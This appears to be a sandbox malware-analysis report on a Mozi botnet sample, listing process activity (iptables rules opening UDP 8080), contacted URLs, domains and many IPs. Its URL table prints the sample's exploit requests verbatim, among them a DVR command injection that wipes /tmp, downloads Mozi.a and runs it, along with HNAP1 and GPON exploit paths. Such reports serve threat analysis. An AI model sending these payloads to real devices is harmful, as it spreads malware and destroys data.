/bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
 clean
/tmp/nT7K5GG5km
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-checkreports
/usr/bin/python3 /usr/share/apport/apport-checkreports --system
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
 clean
/sbin/upstart
n/a
 clean
/bin/sh
/bin/sh -e /proc/self/fd/9
 clean
/bin/sh
n/a
 clean
/bin/date
date
 clean
/bin/sh
n/a
 clean
/usr/share/apport/apport-gtk
/usr/bin/python3 /usr/share/apport/apport-gtk
 clean
There are 155 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://%s:%d/bin.sh;chmod
unknown
 malicious
http://13.109.201.46:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
13.109.201.46
 malicious
http://112.125.239.197:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
112.125.239.197
 malicious
http://3.22.17.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
3.22.17.236
 malicious
http://46.249.83.253:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
46.249.83.253
 malicious
http://154.3.84.96:80/HNAP1/
154.3.84.96
 malicious
http://210.190.146.92:80/HNAP1/
210.190.146.92
 malicious
http://%s:%d/bin.sh
unknown
 malicious
http://123.110.194.55:80/HNAP1/
123.110.194.55
 malicious
http://185.36.171.129:80/HNAP1/
185.36.171.129
 malicious
http://89.129.183.215:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
89.129.183.215
 malicious
http://49.44.132.19:80/HNAP1/
49.44.132.19
 malicious
http://127.0.0.1:80/GponForm/diag_Form?images/
77.182.10.124
 malicious
http://45.148.37.237:80/HNAP1/
45.148.37.237
 malicious
http://184.86.117.97:80/HNAP1/
184.86.117.97
 malicious
http://166.88.13.234:80/HNAP1/
166.88.13.234
 malicious
http://127.0.0.1:8080/GponForm/diag_Form?images/
164.132.95.120
 malicious
http://104.124.230.135:80/HNAP1/
104.124.230.135
 malicious
http://81.196.113.75:80/HNAP1/
81.196.113.75
 malicious
http://204.232.228.51:80/HNAP1/
204.232.228.51
 malicious
http://1.34.1.251:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
1.34.1.251
 malicious
http://188.106.17.156:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
188.106.17.156
 malicious
http://147.46.176.166:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
147.46.176.166
 malicious
http://179.40.62.87:80/HNAP1/
179.40.62.87
 malicious
http://pastebin.ca)
unknown
 clean
http://%s:%d/Mozi.a;chmod
unknown
 clean
http://%s:%d/Mozi.m;$
unknown
 clean
http://schemas.xmlsoap.org/soap/envelope/
unknown
 clean
http://www.pastebin.ca/upload.php
unknown
 clean
http://%s:%d/Mozi.m
unknown
 clean
http://www.alsa-project.org/cardinfo-db/
unknown
 clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
unknown
 clean
http://114.204.63.176:49152/soap.cgi?service=WANIPConn1
114.204.63.176
 clean
http://www.alsa-project.org/alsa-info.sh
unknown
 clean
http://%s:%d/Mozi.m;
unknown
 clean
http://%s:%d/Mozi.a;sh$
unknown
 clean
http://www.pastebin.ca.
unknown
 clean
http://schemas.xmlsoap.org/soap/encoding/
unknown
 clean
http://127.0.0.1
unknown
 clean
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
unknown
 clean
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
unknown
 clean
http://www.alsa-project.org
unknown
 clean
http://127.0.0.1sendcmd
unknown
 clean
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
unknown
 clean
http://ipinfo.io/ip
unknown
 clean
http://%s:%d/Mozi.m;/tmp/Mozi.m
unknown
 clean
http://www.pastebin.ca
unknown
 clean
http://purenetworks.com/HNAP1/
unknown
 clean
http://www.alsa-project.org.
unknown
 clean
http://HTTP/1.1
unknown
 clean
http://schemas.xmlsoap.org/soap/envelope//
unknown
 clean
There are 41 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
dht.transmissionbt.com
87.98.162.88
 clean
bttracker.acc.umu.se
130.239.18.159
 clean
router.bittorrent.com
67.215.246.10
 clean
router.utorrent.com
82.221.103.244
 clean
bttracker.debian.org
unknown
 clean

IPs

IP
Domain
Country
Malicious
19.35.22.33
unknown
United States
malicious
93.203.255.9
unknown
Germany
malicious
164.31.27.58
unknown
Germany
clean
164.176.196.33
unknown
United States
clean
92.10.113.236
unknown
United Kingdom
clean
43.216.7.248
unknown
Japan
clean
62.146.28.116
unknown
Germany
clean
134.136.214.66
unknown
United States
clean
59.186.255.47
unknown
Korea Republic of
clean
58.33.168.139
unknown
China
clean
218.245.32.128
unknown
China
clean
74.73.218.101
unknown
United States
clean
63.112.131.88
unknown
United States
clean
220.49.0.51
unknown
Japan
clean
86.130.232.94
unknown
United Kingdom
clean
75.189.26.238
unknown
United States
clean
155.117.48.151
unknown
United States
clean
191.213.118.143
unknown
Brazil
clean
190.61.180.10
unknown
Colombia
clean
122.107.18.193
unknown
Australia
clean
29.68.34.28
unknown
United States
clean
185.226.106.196
unknown
Spain
clean
175.165.55.236
unknown
China
clean
32.119.200.236
unknown
United States
clean
72.87.194.121
unknown
United States
clean
213.121.103.4
unknown
United Kingdom
clean
166.120.240.93
unknown
Australia
clean
162.48.192.209
unknown
United States
clean
86.249.71.23
unknown
France
clean
98.37.89.152
unknown
United States
clean
148.200.165.122
unknown
Netherlands
clean
72.208.107.184
unknown
United States
clean
100.54.104.98
unknown
United States
clean
113.178.195.53
unknown
Viet Nam
clean
113.202.99.35
unknown
China
clean
99.198.164.146
unknown
United States
clean
113.138.14.215
unknown
China
clean
73.109.81.199
unknown
United States
clean
35.155.184.95
unknown
United States
clean
50.83.208.186
unknown
United States
clean
39.167.82.179
unknown
China
clean
75.36.210.166
unknown
United States
clean
59.249.34.45
unknown
China
clean
111.253.169.172
unknown
Taiwan; Republic of China (ROC)
clean
125.15.133.201
unknown
Japan
clean
172.222.196.31
unknown
United States
clean
72.68.142.193
unknown
United States
clean
103.58.197.248
unknown
unknown
clean
11.3.231.145
unknown
United States
clean
32.227.55.20
unknown
United States
clean
168.26.94.133
unknown
United States
clean
181.148.98.93
unknown
Colombia
clean
186.64.54.15
unknown
Argentina
clean
101.244.33.33
unknown
China
clean
195.254.187.23
unknown
unknown
clean
149.52.60.248
unknown
United States
clean
97.23.253.187
unknown
United States
clean
24.144.48.190
unknown
United States
clean
36.47.114.54
unknown
China
clean
67.168.47.89
unknown
United States
clean
140.43.31.90
unknown
United States
clean
69.150.69.116
unknown
United States
clean
201.181.160.44
unknown
Argentina
clean
8.171.95.12
unknown
Singapore
clean
198.198.32.42
unknown
United States
clean
46.42.169.51
unknown
Russian Federation
clean
154.138.26.112
unknown
Egypt
clean
72.24.210.73
unknown
United States
clean
12.96.110.207
unknown
United States
clean
40.96.198.202
unknown
United States
clean
55.204.254.198
unknown
United States
clean
83.68.127.228
unknown
France
clean
110.86.197.212
unknown
China
clean
173.80.87.48
unknown
United States
clean
24.159.133.235
unknown
United States
clean
215.107.106.224
unknown
United States
clean
17.103.12.181
unknown
United States
clean
207.144.55.208
unknown
United States
clean
88.103.196.15
unknown
Czech Republic
clean
197.223.37.86
unknown
Egypt
clean
196.224.36.136
unknown
Tunisia
clean
85.110.95.80
unknown
Turkey
clean
16.158.169.248
unknown
United States
clean
195.76.91.176
unknown
Spain
clean
58.20.74.167
unknown
China
clean
173.134.223.176
unknown
United States
clean
39.189.171.124
unknown
China
clean
175.3.12.174
unknown
China
clean
166.183.247.157
unknown
United States
clean
5.41.198.250
unknown
Saudi Arabia
clean
106.128.236.208
unknown
Japan
clean
135.48.205.7
unknown
United States
clean
27.219.87.4
unknown
China
clean
93.45.184.9
unknown
Italy
clean
91.102.92.141
unknown
Denmark
clean
66.148.28.100
unknown
Canada
clean
218.34.211.21
unknown
Taiwan; Republic of China (ROC)
clean
157.98.25.110
unknown
United States
clean
168.44.159.27
unknown
United States
clean
141.57.194.108
unknown
Germany
clean
There are 90 hidden IPs, click here to show them.